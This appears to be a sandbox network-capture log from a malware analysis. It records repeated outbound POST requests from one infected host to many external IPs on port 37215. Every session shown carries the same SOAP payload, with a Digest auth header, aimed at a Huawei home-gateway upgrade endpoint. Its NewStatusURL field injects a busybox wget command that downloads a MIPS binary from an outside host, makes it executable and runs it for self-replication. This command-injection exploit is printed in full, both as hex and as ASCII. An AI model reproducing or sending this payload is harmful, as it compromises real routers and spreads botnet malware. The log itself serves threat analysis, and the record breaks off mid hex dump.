                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          373192.168.2.1546726157.26.3.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552931070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          374192.168.2.1546494157.44.93.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552973986 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          375192.168.2.154116041.255.31.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.553005934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          376192.168.2.1551764197.180.145.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.553045034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          377192.168.2.1554496197.205.95.21737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.553062916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          378192.168.2.1554096157.205.116.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.553090096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:48.797946930 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:49.241905928 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          379192.168.2.155385841.208.0.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.553142071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          380192.168.2.1532848197.57.208.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.553164959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 